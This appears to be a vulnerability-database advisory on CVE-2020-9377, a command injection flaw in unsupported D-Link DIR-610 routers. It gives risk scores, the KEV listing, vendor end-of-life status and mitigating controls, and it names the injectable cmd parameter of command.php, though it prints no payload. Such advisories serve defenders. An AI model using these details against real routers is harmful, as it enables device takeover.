Cyber Resilience

CVE-2020-9377

HighCISA KEVActive ExploitationEUVD ExploitedPublic PoCRCE

Published: 09 July 2020

Published
09 July 2020
Modified
10 November 2025
KEV Added
25 March 2022
Patch
CVSS Score v3.1 8.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.7664 99.0th percentile
Risk Priority 84 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2020-9377 is a high-severity OS Command Injection (CWE-78) vulnerability in Dlink Dir-610 Firmware. Its CVSS base score is 8.8 (High).

Operationally, ranked in the top 1.0% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SA-22 (Unsupported System Components) and SI-10 (Information Input Validation).

Deeper analysis

D-Link DIR-610 wireless routers contain an OS command injection vulnerability, identified as CVE-2020-9377 and assigned CWE-78. The flaw exists in the command.php script, which accepts an unsanitized cmd parameter that is passed directly to the underlying operating system. The vulnerability affects only devices that are no longer supported by the vendor.

An attacker with network access and a valid low-privileged account can send crafted HTTP requests containing arbitrary shell commands in the cmd parameter. Because the CVSS vector shows network attack vector, low complexity, and no user interaction, successful exploitation results in full command execution with impacts to confidentiality, integrity, and availability.

D-Link security advisory SAP10182 states that the DIR-610 has reached end-of-life and will receive no patches or ongoing support. The vendor directs users to the product page confirming the unsupported status and recommends replacing the device.

The published proof-of-concept on GitHub demonstrates direct remote command execution against exposed devices.

EU & UK References

Vulnerability details

D-Link DIR-610 devices allow Remote Command Execution via the cmd parameter to command.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer

CWE(s)
KEV Date Added
25 March 2022

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

dlink
dir-610 firmware
all versions

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly requires replacement or isolation of the unsupported DIR-610 that receives no patches for the command.php flaw.

prevent

Mandates validation and sanitization of the unsanitized cmd parameter that enables OS command injection.

prevent

Enforces boundary protection to block network access to the vulnerable command.php endpoint on exposed routers.

References